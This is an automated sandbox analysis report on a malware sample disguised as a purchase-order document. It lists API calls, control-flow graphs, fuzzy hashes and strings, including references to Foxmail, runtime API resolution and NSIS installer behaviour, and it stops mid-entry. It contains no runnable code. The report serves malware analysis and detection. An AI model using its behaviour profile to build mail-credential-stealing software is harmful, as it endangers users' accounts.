                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: d52af016808f7f10de2b4438c2b0c03196c56e0687382a99658a0adff1d7b72a
                                                              • Instruction ID: 709253a01f2cf264d4cb4b0298852dd32f2141e646c32cdb7a0aec76a5b7e224
                                                              • Opcode Fuzzy Hash: d52af016808f7f10de2b4438c2b0c03196c56e0687382a99658a0adff1d7b72a
                                                              • Instruction Fuzzy Hash: 7121A575504309ABD710EAB49C8CF9B7BDCEF84324F00092EF999D3190EB78D6558796

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 382A1434
                                                                • Part of subcall function 382A10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 382A1137
                                                                • Part of subcall function 382A10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 382A1151
                                                                • Part of subcall function 382A10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A115C
                                                                • Part of subcall function 382A10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A116D
                                                                • Part of subcall function 382A10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A117C
                                                                • Part of subcall function 382A10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 382A1193
                                                                • Part of subcall function 382A10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 382A11D0
                                                                • Part of subcall function 382A10F1: FindClose.KERNEL32(00000000), ref: 382A11DB
                                                              • lstrlenW.KERNEL32(?), ref: 382A14C5
                                                              • lstrlenW.KERNEL32(?), ref: 382A14E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 382A150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 382A1521
                                                              • lstrlenW.KERNEL32(?,?), ref: 382A1547
                                                              • lstrcatW.KERNEL32(00000000), ref: 382A1553
                                                              • lstrlenW.KERNEL32(?,?), ref: 382A1579
                                                              • lstrcatW.KERNEL32(00000000), ref: 382A1585
                                                              • lstrlenW.KERNEL32(?,?), ref: 382A15AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 382A15B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: fcd34f8cfae5f760a1011317e1f618ce8bde005252f02721cbb3612f6bc78102
                                                              • Instruction ID: 565c7c371c4e8b406a33dbd8086006bf343bdd9d4fe3dbcfab9c1826c348416d
                                                              • Opcode Fuzzy Hash: fcd34f8cfae5f760a1011317e1f618ce8bde005252f02721cbb3612f6bc78102
                                                              • Instruction Fuzzy Hash: 9A81AF75A40358AADB20DBA0DC85FEE7379EF84710F00099AFA09E7190EE755A84CF95

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(382AC7DD), ref: 382AC7E6
                                                              • GetModuleHandleA.KERNEL32(?,382AC7DD), ref: 382AC838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 382AC860
                                                                • Part of subcall function 382AC803: GetProcAddress.KERNEL32(00000000,382AC7F4), ref: 382AC804
                                                                • Part of subcall function 382AC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC816
                                                                • Part of subcall function 382AC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC82A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 160f04c8a9d4165c998015c31662357fe01de1056cc1dc6b9f20cc76d507a6f7
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: CB012448945342BDBB17577C0C05ABAAF9CBF277A0B101BA6E050CB193DDAC8906C3F6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 79 382ac7a7-382ac7bc 80 382ac7be-382ac7c6 79->80 81 382ac82d 79->81 80->81 83 382ac7c8-382ac7f6 call 382ac7e6 80->83 82 382ac82f-382ac833 81->82 84 382ac872 call 382ac877 82->84 85 382ac835-382ac83d GetModuleHandleA 82->85 91 382ac7f8 83->91 92 382ac86c-382ac86e 83->92 88 382ac83f-382ac847 85->88 88->88 90 382ac849-382ac84c 88->90 90->82 95 382ac84e-382ac850 90->95 93 382ac7fa-382ac7fe 91->93 94 382ac85b-382ac85e 91->94 96 382ac870 92->96 97 382ac866-382ac86b 92->97 102 382ac800-382ac80b GetProcAddress 93->102 103 382ac865 93->103 101 382ac85f-382ac860 GetProcAddress 94->101 99 382ac852-382ac854 95->99 100 382ac856-382ac85a 95->100 96->90 97->92 99->101 100->94 101->103 102->81 104 382ac80d-382ac81a VirtualProtect 102->104 103->97 105 382ac82c 104->105 106 382ac81c-382ac82a VirtualProtect 104->106 105->81 106->105
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,382AC7DD), ref: 382AC838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 382AC860
                                                                • Part of subcall function 382AC7E6: GetModuleHandleA.KERNEL32(382AC7DD), ref: 382AC7E6
                                                                • Part of subcall function 382AC7E6: GetProcAddress.KERNEL32(00000000,382AC7F4), ref: 382AC804
                                                                • Part of subcall function 382AC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC816
                                                                • Part of subcall function 382AC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC82A
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction ID: 5a523b7bb0e8584983e81cabd0ace2518891b580af0b1ecc6273c0b033dc2f04
                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction Fuzzy Hash: 5B21D66A449382AFF7138B7C4C04BA67FD9BF173A0F194696D050CB143DDAC9846C3A6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 107 382ac803-382ac80b GetProcAddress 108 382ac82d 107->108 109 382ac80d-382ac81a VirtualProtect 107->109 112 382ac82f-382ac833 108->112 110 382ac82c 109->110 111 382ac81c-382ac82a VirtualProtect 109->111 110->108 111->110 113 382ac872 call 382ac877 112->113 114 382ac835-382ac83d GetModuleHandleA 112->114 116 382ac83f-382ac847 114->116 116->116 117 382ac849-382ac84c 116->117 117->112 118 382ac84e-382ac850 117->118 119 382ac852-382ac854 118->119 120 382ac856-382ac85e 118->120 121 382ac85f-382ac865 GetProcAddress 119->121 120->121 124 382ac866-382ac86e 121->124 126 382ac870 124->126 126->117
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,382AC7F4), ref: 382AC804
                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC816
                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,382AC7F4,382AC7DD), ref: 382AC82A
                                                              • GetModuleHandleA.KERNEL32(?,382AC7DD), ref: 382AC838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 382AC860
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                              • String ID:
                                                              • API String ID: 2152742572-0
                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction ID: c8ed0a8126b15aa4c6f7a8f272722dce456321dd75928a945c5e95852bf6e155
                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction Fuzzy Hash: F9F0F689545742BCFA1346BC0C45EB69FCDAF277A0B101A56E110C7183DCAD890683F6

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 187 404bb0-404bfc GetDlgItem * 2 188 404c02-404c96 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 187->188 189 404e1d-404e24 187->189 190 404ca5-404cac DeleteObject 188->190 191 404c98-404ca3 SendMessageW 188->191 192 404e26-404e36 189->192 193 404e38 189->193 195 404cae-404cb6 190->195 191->190 194 404e3b-404e44 192->194 193->194 196 404e46-404e49 194->196 197 404e4f-404e55 194->197 198 404cb8-404cbb 195->198 199 404cdf-404ce3 195->199 196->197 200 404f33-404f3a 196->200 203 404e64-404e6b 197->203 204 404e57-404e5e 197->204 201 404cc0-404cdd call 405fae SendMessageW * 2 198->201 202 404cbd 198->202 199->195 205 404ce5-404d11 call 40419a * 2 199->205 210 404fab-404fb3 200->210 211 404f3c-404f42 200->211 201->199 202->201 207 404ee0-404ee3 203->207 208 404e6d-404e70 203->208 204->200 204->203 243 404d17-404d1d 205->243 244 404ddc-404def GetWindowLongW SetWindowLongW 205->244 207->200 212 404ee5-404eef 207->212 216 404e72-404e79 208->216 217 404e7b-404e90 call 404afe 208->217 214 404fb5-404fbb SendMessageW 210->214 215 404fbd-404fc4 210->215 219 405193-4051a5 call 404201 211->219 220 404f48-404f52 211->220 222 404ef1-404efd SendMessageW 212->222 223 404eff-404f09 212->223 214->215 224 404fc6-404fcd 215->224 225 404ff8-404fff 215->225 216->207 216->217 217->207 242 404e92-404ea3 217->242 220->219 228 404f58-404f67 SendMessageW 220->228 222->223 223->200 230 404f0b-404f15 223->230 231 404fd6-404fdd 224->231 232 404fcf-404fd0 ImageList_Destroy 224->232 235 405155-40515c 225->235 236 405005-405011 call 4011ef 225->236 228->219 237 404f6d-404f7e SendMessageW 228->237 238 404f26-404f30 230->238 239 404f17-404f24 230->239 240 404fe6-404ff2 231->240 241 404fdf-404fe0 GlobalFree 231->241 232->231 235->219 248 40515e-405165 235->248 262 405021-405024 236->262 263 405013-405016 236->263 246 404f80-404f86 237->246 247 404f88-404f8a 237->247 238->200 239->200 240->225 241->240 242->207 251 404ea5-404ea7 242->251 252 404d20-404d27 243->252 250 404df5-404df9 244->250 246->247 254 404f8b-404fa4 call 401299 SendMessageW 246->254 247->254 248->219 249 405167-405191 ShowWindow GetDlgItem ShowWindow 248->249 249->219 256 404e13-404e1b call 4041cf 250->256 257 404dfb-404e0e ShowWindow call 4041cf 250->257 258 404ea9-404eb0 251->258 259 404eba 251->259 260 404dbd-404dd0 252->260 261 404d2d-404d55 252->261 254->210 256->189 257->219 270 404eb2-404eb4 258->270 271 404eb6-404eb8 258->271 274 404ebd-404ed9 call 40117d 259->274 260->252 265 404dd6-404dda 260->265 272 404d57-404d8d SendMessageW 261->272 273 404d8f-404d91 261->273 266 405065-405089 call 4011ef 262->266 267 405026-40503f call 4012e2 call 401299 262->267 275 405018 263->275 276 405019-40501c call 404b7e 263->276 265->244 265->250 289 40512b-40513f InvalidateRect 266->289 290 40508f 266->290 294 405041-405047 267->294 295 40504f-40505e SendMessageW 267->295 270->274 271->274 272->260 282 404d93-404da2 SendMessageW 273->282 283 404da4-404dba SendMessageW 273->283 274->207 275->276 276->262 282->260 283->260 289->235 293 405141-405150 call 404ad1 call 404ab9 289->293 291 405092-40509d 290->291 296 405113-405125 291->296 297 40509f-4050ae 291->297 293->235 301 405049 294->301 302 40504a-40504d 294->302 295->266 296->289 296->291 299 4050b0-4050bd 297->299 300 4050c1-4050c4 297->300 299->300 304 4050c6-4050c9 300->304 305 4050cb-4050d4 300->305 301->302 302->294 302->295 307 4050d9-405111 SendMessageW * 2 304->307 305->307 308 4050d6 305->308 307->296 308->307
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404BC8
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404BD3
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C1D
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404C30
                                                              • SetWindowLongW.USER32(?,000000FC,004051A8), ref: 00404C49
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C5D
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C6F
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404C85
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C91
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404CA3
                                                              • DeleteObject.GDI32(00000000), ref: 00404CA6
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404CD1
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404DE1
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DEF
                                                              • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F77
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F9B
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                              • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                              • InvalidateRect.USER32(?,00000000,?), ref: 00405131
                                                              • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                              • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                              • ShowWindow.USER32(00000000), ref: 00405191
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                              • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                              • Opcode Fuzzy Hash: 5536270c612583b56431b6cecbe513891586c3f04ea08752845fd7aab356c235
                                                              • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 309 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 316 4033f4-4033f6 309->316 317 4033fb-40340f call 405a04 CharNextW 309->317 316->317 320 40350a-403510 317->320 321 403414-40341a 320->321 322 403516 320->322 323 403423-40342a 321->323 324 40341c-403421 321->324 325 40352a-403544 GetTempPathW call 403326 322->325 326 403432-403436 323->326 327 40342c-403431 323->327 324->323 324->324 332 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 325->332 333 40359c-4035b6 DeleteFileW call 402dbc 325->333 329 4034f7-403506 call 405a04 326->329 330 40343c-403442 326->330 327->326 329->320 348 403508-403509 329->348 335 403444-40344b 330->335 336 40345c-403495 330->336 332->333 352 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 332->352 354 403667-403676 call 40382d OleUninitialize 333->354 355 4035bc-4035c2 333->355 340 403452 335->340 341 40344d-403450 335->341 342 4034b2-4034ec 336->342 343 403497-40349c 336->343 340->336 341->336 341->340 345 4034f4-4034f6 342->345 346 4034ee-4034f2 342->346 343->342 349 40349e-4034a6 343->349 345->329 346->345 353 403518-403525 call 405f8c 346->353 348->320 350 4034a8-4034ab 349->350 351 4034ad 349->351 350->342 350->351 351->342 352->333 352->354 353->325 365 403772-403778 354->365 366 40367c-40368c call 405768 ExitProcess 354->366 357 403657-403663 call 40391f 355->357 358 4035c8-4035d3 call 405a04 355->358 357->354 372 403621-40362b 358->372 373 4035d5-40360a 358->373 370 403815-40381d 365->370 371 40377e-40379b call 4062f6 * 3 365->371 377 403823-403827 ExitProcess 370->377 378 40381f 370->378 401 4037e5-4037f3 call 4062f6 371->401 402 40379d-40379f 371->402 375 403692-4036ac lstrcatW lstrcmpiW 372->375 376 40362d-40363b call 405adf 372->376 380 40360c-403610 373->380 375->354 382 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 375->382 376->354 392 40363d-403653 call 405f8c * 2 376->392 378->377 384 403612-403617 380->384 385 403619-40361d 380->385 388 4036d1-4036fa call 405f8c 382->388 389 4036c6-4036cc call 405f8c 382->389 384->385 386 40361f 384->386 385->380 385->386 386->372 400 4036ff-40371b call 405fae DeleteFileW 388->400 389->388 392->357 411 40375c-403764 400->411 412 40371d-40372d CopyFileW 400->412 414 403801-40380c ExitWindowsEx 401->414 415 4037f5-4037ff 401->415 402->401 405 4037a1-4037a3 402->405 405->401 409 4037a5-4037b7 GetCurrentProcess 405->409 409->401 424 4037b9-4037db 409->424 411->400 413 403766-40376d call 405e26 411->413 412->411 416 40372f-40374f call 405e26 call 405fae call 405703 412->416 413->354 414->370 418 40380e-403810 call 40140b 414->418 415->414 415->418 416->411 431 403751-403758 CloseHandle 416->431 418->370 424->401 431->411
                                                              APIs
                                                              • #17.COMCTL32 ref: 00403379
                                                              • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                              • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                              • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                              • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                              • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                              • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                              • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                              • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                              • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                              • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                              • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                              • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                              • OleUninitialize.OLE32(?), ref: 0040366C
                                                              • ExitProcess.KERNEL32 ref: 0040368C
                                                              • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                              • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                              • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                              • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                              • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                              • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 00403725
                                                              • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                              • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                              • ExitProcess.KERNEL32 ref: 00403827
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                              • API String ID: 4107622049-1875889550
                                                              • Opcode ID: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                              • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                              • Opcode Fuzzy Hash: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                              • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E
                                                              APIs
                                                              • DeleteFileW.KERNEL32(?,?,00436800,75572EE0,00434000), ref: 0040583D
                                                              • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,75572EE0,00434000), ref: 00405885
                                                              • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 004058A8
                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 004058AE
                                                              • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,75572EE0,00434000), ref: 004058BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                              • FindClose.KERNEL32(00000000), ref: 0040596D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: \*.*
                                                              • API String ID: 2035342205-1173974218
                                                              • Opcode ID: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                              • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                              • Opcode Fuzzy Hash: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                              • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                              • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                              • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                              • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405B28,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,75572EE0,00405834,?,00436800,75572EE0), ref: 004062DA
                                                              • FindClose.KERNEL32(00000000), ref: 004062E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
